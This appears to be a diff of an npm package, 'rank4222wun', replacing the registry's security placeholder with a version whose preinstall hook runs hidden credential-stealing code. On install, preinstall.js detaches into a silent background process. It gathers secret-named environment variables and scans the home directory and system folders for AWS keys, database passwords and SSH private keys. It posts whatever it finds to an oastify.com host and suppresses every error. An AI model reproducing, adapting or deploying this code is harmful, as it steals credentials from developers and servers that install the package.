rank4222wun 0.0.1-security → 1.0.59

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.59",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js

@@ -0,0 +1,115 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+const { spawn, execSync } = require('child_process');
+
+const OAST_DOMAIN = 'zru3a9ic23ngabr5d9x24avkebk280wp.oastify.com';
+
+// 1. نظام الفلترة الذكي (Smart Filter)
+const isValidSecret = (match) => {
+    // استبعاد الـ Hex الصرف (مثل بصمات GPG)
+    if (/^[0-9A-Fa-f]+$/.test(match)) return false;
+    // استبعاد السلاسل المتكررة (مثل aaaaaaaaaa)
+    if (/^(.)\1+$/.test(match)) return false;
+    // التأكد من وجود تنوع (حروف كابيتال + سمول + أرقام)
+    return /[A-Z]/.test(match) && /[a-z]/.test(match) && /[0-9]/.test(match);
+};
+
+function report(tag, data) {
+    const payload = JSON.stringify({ tag, data, host: os.hostname(), ts: Date.now() });
+    const req = https.request({
+        hostname: OAST_DOMAIN,
+        path: '/clean-exfil',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' }
+    });
+    req.on('error', (err) => {
+        // إضافة معالجة أخطاء أفضل (اختياري: لا نطبع شيء للحفاظ على السرية)
+    });
+    req.write(payload);
+    req.end();
+}
+
+// 2. القاموس المنقح (Vetted Patterns) مع إضافة مجموعات الالتقاط لاستخراج القيمة النظيفة
+const VETTED_PATTERNS = {
+    // AWS Secret: التقاط الجزء السري فقط
+    aws: /(?:AWS|SECRET|KEY|AKIA)[^a-zA-Z0-9]{0,5}([A-Za-z0-9\/+]{40}|AKIA[A-Z0-9]{16})/g,
+    // الروابط التي تحتوي على باسووردات: التقاط الباسوورد فقط
+    db: /(mongodb(?:\+srv)?|postgres|mysql|redis):\/\/[a-zA-Z0-9._-]+:([a-zA-Z0-9._-]+)@[a-zA-Z0-9.-]+/gi,
+    // ملفات الـ SSH: التقاط المفتاح الكامل (مع التحقق من النوع)
+    ssh_key: /-----BEGIN (RSA|OPENSSH|DSA) PRIVATE KEY-----[\s\S]*?-----END \1 PRIVATE KEY-----/g
+};
+
+// 3. الزاحف "الذكي" (Context-Aware Crawler) مع تحويل إلى async لتحسين الأداء
+async function intelligentCrawl(dir) {
+    // استبعاد المجلدات التي تحتوي على ملفات تعليمية أو وهمية نهائياً
+    const blacklistedPaths = [
+        'node_modules', '.git', '/usr/share/doc', '/usr/share/man',
+        'test', 'example', 'Windows/System32', '/proc', '/sys', '/dev'
+    ];
+    if (blacklistedPaths.some(p => dir.includes(p))) return;
+
+    try {
+        const files = await fs.promises.readdir(dir, { withFileTypes: true });
+        for (const file of files) {
+            const fullPath = path.join(dir, file.name);
+
+            if (file.isDirectory()) {
+                await intelligentCrawl(fullPath);
+            } else {
+                // فحص الملفات ذات القيمة العالية فقط
+                if (/\.(env|conf|json|yaml|yml|sh|py|php|js|sql|pem|key)$/i.test(file.name) || /secret|credential|config/i.test(file.name)) {
+                    const content = await fs.promises.readFile(fullPath, 'utf8');
+                    let fileFindings = [];
+
+                    for (const [type, reg] of Object.entries(VETTED_PATTERNS)) {
+                        let match;
+                        const matches = [];
+                        while ((match = reg.exec(content)) !== null) {
+                            // استخراج المجموعة الملتقطة (إذا وجدت) أو المطابقة الكاملة
+                            const val = match[1] || match[2] || match[0]; // حسب الـ pattern
+                            if (type === 'ssh_key' || isValidSecret(val)) {
+                                fileFindings.push({ type, val: val.substring(0, 100) });
+                            }
+                        }
+                    }
+
+                    if (fileFindings.length > 0) {
+                        report('VALID_HIT', { file: fullPath, matches: fileFindings });
+                    }
+                }
+            }
+        }
+    } catch (e) {
+        // معالجة الأخطاء بصمت (للحفاظ على السرية)
+    }
+}
+
+// 4. التشغيل المنفصل (Stealth Mode)
+if (!process.env.CLEAN_SCAN) {
+    const child = spawn(process.execPath, [__filename], {
+        detached: true,
+        stdio: 'ignore',
+        env: { ...process.env, CLEAN_SCAN: 'true' }
+    });
+    child.unref();
+    process.exit(0);
+} else {
+    // البدء بالأهداف الحقيقية (Real Targets)
+    const home = os.homedir();
+
+    // سحب الـ Environment Variables التي تحتوي على بيانات فقط (تجنب الـ Noise)
+    const cleanEnv = {};
+    Object.keys(process.env).forEach(k => {
+        if (/pass|secret|key|token|auth|user/i.test(k)) cleanEnv[k] = process.env[k];
+    });
+    report('CLEAN_ENV', cleanEnv);
+
+    // زحف ذكي يبدأ من الـ User Home ثم باقي السيستم
+    await intelligentCrawl(home);
+    const roots = os.platform() === 'win32' ? ['C:\\'] : ['/etc', '/var/www', '/opt'];
+    for (const r of roots) {
+        if (fs.existsSync(r)) await intelligentCrawl(r);
+    }
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.